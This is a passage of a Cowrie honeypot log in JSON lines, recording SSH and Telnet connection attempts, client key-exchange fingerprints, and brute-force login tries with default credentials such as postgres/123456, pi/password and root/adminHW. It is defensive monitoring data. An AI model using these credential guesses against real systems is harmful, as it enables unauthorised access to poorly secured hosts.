sh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:09:12.660482Z","src_ip":"196.251.115.108","session":"c74d3e73d70d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456789","message":"login attempt [postgres/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T23:09:15.789051Z","src_ip":"196.251.115.108","session":"c74d3e73d70d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60030,"dst_ip":"1.2.3.4","dst_port":22,"session":"4398a8aa9466","protocol":"ssh","message":"New connection: 217.72.205.35:60030 (1.2.3.4:22) [session: 4398a8aa9466]","sensor":"my-vps","timestamp":"2025-08-24T23:09:15.906101Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:09:15.907234Z","src_ip":"217.72.205.35","session":"4398a8aa9466"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:09:16.881377Z","src_ip":"196.251.115.108","session":"c74d3e73d70d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":45388,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d553cb10598","protocol":"ssh","message":"New connection: 196.251.115.108:45388 (1.2.3.4:22) [session: 3d553cb10598]","sensor":"my-vps","timestamp":"2025-08-24T23:09:59.076310Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:09:59.399572Z","src_ip":"196.251.115.108","session":"3d553cb10598"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:09:59.459620Z","src_ip":"196.251.115.108","session":"3d553cb10598"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345","message":"login attempt [postgres/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T23:10:02.374711Z","src_ip":"196.251.115.108","session":"3d553cb10598"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:10:03.558184Z","src_ip":"196.251.115.108","session":"3d553cb10598"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":37358,"dst_ip":"1.2.3.4","dst_port":23,"session":"402c1d2943a7","protocol":"telnet","message":"New connection: 176.65.149.186:37358 (1.2.3.4:23) [session: 402c1d2943a7]","sensor":"my-vps","timestamp":"2025-08-24T23:10:25.819170Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:10:25.858068Z","src_ip":"176.65.149.186","session":"402c1d2943a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:10:25.877841Z","src_ip":"176.65.149.186","session":"402c1d2943a7"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-24T23:10:25.879992Z","src_ip":"176.65.149.186","session":"402c1d2943a7"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-24T23:10:25.880990Z","src_ip":"176.65.149.186","session":"402c1d2943a7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":52142,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1147527de5d","protocol":"ssh","message":"New connection: 196.251.115.108:52142 (1.2.3.4:22) [session: e1147527de5d]","sensor":"my-vps","timestamp":"2025-08-24T23:10:47.249322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:10:47.534294Z","src_ip":"196.251.115.108","session":"e1147527de5d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:10:47.535162Z","src_ip":"196.251.115.108","session":"e1147527de5d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"12345678","message":"login attempt [postgres/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T23:10:50.986835Z","src_ip":"196.251.115.108","session":"e1147527de5d"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:10:52.160846Z","src_ip":"196.251.115.108","session":"e1147527de5d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":57206,"dst_ip":"1.2.3.4","dst_port":22,"session":"be49acca9206","protocol":"ssh","message":"New connection: 196.251.115.108:57206 (1.2.3.4:22) [session: be49acca9206]","sensor":"my-vps","timestamp":"2025-08-24T23:11:36.888180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:11:37.228776Z","src_ip":"196.251.115.108","session":"be49acca9206"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:11:37.229499Z","src_ip":"196.251.115.108","session":"be49acca9206"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"qwerty","message":"login attempt [postgres/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-24T23:11:41.159567Z","src_ip":"196.251.115.108","session":"be49acca9206"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:11:42.355548Z","src_ip":"196.251.115.108","session":"be49acca9206"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":34916,"dst_ip":"1.2.3.4","dst_port":22,"session":"73eb01348225","protocol":"ssh","message":"New connection: 196.251.115.108:34916 (1.2.3.4:22) [session: 73eb01348225]","sensor":"my-vps","timestamp":"2025-08-24T23:12:27.446726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:12:27.834307Z","src_ip":"196.251.115.108","session":"73eb01348225"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:12:27.835061Z","src_ip":"196.251.115.108","session":"73eb01348225"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123123","message":"login attempt [postgres/123123] failed","sensor":"my-vps","timestamp":"2025-08-24T23:12:31.974395Z","src_ip":"196.251.115.108","session":"73eb01348225"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:12:33.112984Z","src_ip":"196.251.115.108","session":"73eb01348225"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":45072,"dst_ip":"1.2.3.4","dst_port":22,"session":"bff640ec5fe9","protocol":"ssh","message":"New connection: 196.251.115.108:45072 (1.2.3.4:22) [session: bff640ec5fe9]","sensor":"my-vps","timestamp":"2025-08-24T23:13:17.596219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:13:18.585832Z","src_ip":"196.251.115.108","session":"bff640ec5fe9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:13:18.599248Z","src_ip":"196.251.115.108","session":"bff640ec5fe9"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"111111","message":"login attempt [postgres/111111] failed","sensor":"my-vps","timestamp":"2025-08-24T23:13:22.174706Z","src_ip":"196.251.115.108","session":"bff640ec5fe9"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:13:23.376638Z","src_ip":"196.251.115.108","session":"bff640ec5fe9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:13:25.881506Z","src_ip":"176.65.149.186","session":"402c1d2943a7"}
{"eventid":"cowrie.session.closed","duration":180.06645321846008,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:13:25.885550Z","src_ip":"176.65.149.186","session":"402c1d2943a7"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":45676,"dst_ip":"1.2.3.4","dst_port":22,"session":"94d3a1ac7e9c","protocol":"ssh","message":"New connection: 196.251.115.108:45676 (1.2.3.4:22) [session: 94d3a1ac7e9c]","sensor":"my-vps","timestamp":"2025-08-24T23:14:08.195210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:14:08.523796Z","src_ip":"196.251.115.108","session":"94d3a1ac7e9c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:14:08.524496Z","src_ip":"196.251.115.108","session":"94d3a1ac7e9c"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1234567","message":"login attempt [postgres/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:14:12.398582Z","src_ip":"196.251.115.108","session":"94d3a1ac7e9c"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:14:13.669883Z","src_ip":"196.251.115.108","session":"94d3a1ac7e9c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":52220,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3e8a836db43","protocol":"ssh","message":"New connection: 196.251.115.108:52220 (1.2.3.4:22) [session: d3e8a836db43]","sensor":"my-vps","timestamp":"2025-08-24T23:14:56.302294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:14:57.508824Z","src_ip":"196.251.115.108","session":"d3e8a836db43"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:14:57.509446Z","src_ip":"196.251.115.108","session":"d3e8a836db43"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456","message":"login attempt [pi/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:15:00.491987Z","src_ip":"196.251.115.108","session":"d3e8a836db43"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:15:01.722595Z","src_ip":"196.251.115.108","session":"d3e8a836db43"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":38360,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a10d37ea1ce","protocol":"telnet","message":"New connection: 176.65.149.186:38360 (1.2.3.4:23) [session: 6a10d37ea1ce]","sensor":"my-vps","timestamp":"2025-08-24T23:15:25.982231Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:15:26.022931Z","src_ip":"176.65.149.186","session":"6a10d37ea1ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:15:26.081530Z","src_ip":"176.65.149.186","session":"6a10d37ea1ce"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-24T23:15:26.083013Z","src_ip":"176.65.149.186","session":"6a10d37ea1ce"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-24T23:15:26.083916Z","src_ip":"176.65.149.186","session":"6a10d37ea1ce"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":33212,"dst_ip":"1.2.3.4","dst_port":22,"session":"89e0b6a70f86","protocol":"ssh","message":"New connection: 196.251.115.108:33212 (1.2.3.4:22) [session: 89e0b6a70f86]","sensor":"my-vps","timestamp":"2025-08-24T23:15:43.319318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:15:43.626463Z","src_ip":"196.251.115.108","session":"89e0b6a70f86"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:15:43.627176Z","src_ip":"196.251.115.108","session":"89e0b6a70f86"}
{"eventid":"cowrie.login.failed","username":"pi","password":"password","message":"login attempt [pi/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:15:46.631114Z","src_ip":"196.251.115.108","session":"89e0b6a70f86"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:15:47.791517Z","src_ip":"196.251.115.108","session":"89e0b6a70f86"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55478,"dst_ip":"1.2.3.4","dst_port":22,"session":"49b221bcdb14","protocol":"ssh","message":"New connection: 217.72.205.35:55478 (1.2.3.4:22) [session: 49b221bcdb14]","sensor":"my-vps","timestamp":"2025-08-24T23:16:07.666333Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:16:07.667764Z","src_ip":"217.72.205.35","session":"49b221bcdb14"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":37278,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c2737d3eead","protocol":"telnet","message":"New connection: 79.124.8.120:37278 (1.2.3.4:23) [session: 5c2737d3eead]","sensor":"my-vps","timestamp":"2025-08-24T23:16:18.861012Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-24T23:16:18.900388Z","src_ip":"79.124.8.120","session":"5c2737d3eead"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T23:16:18.953234Z","src_ip":"79.124.8.120","session":"5c2737d3eead"}
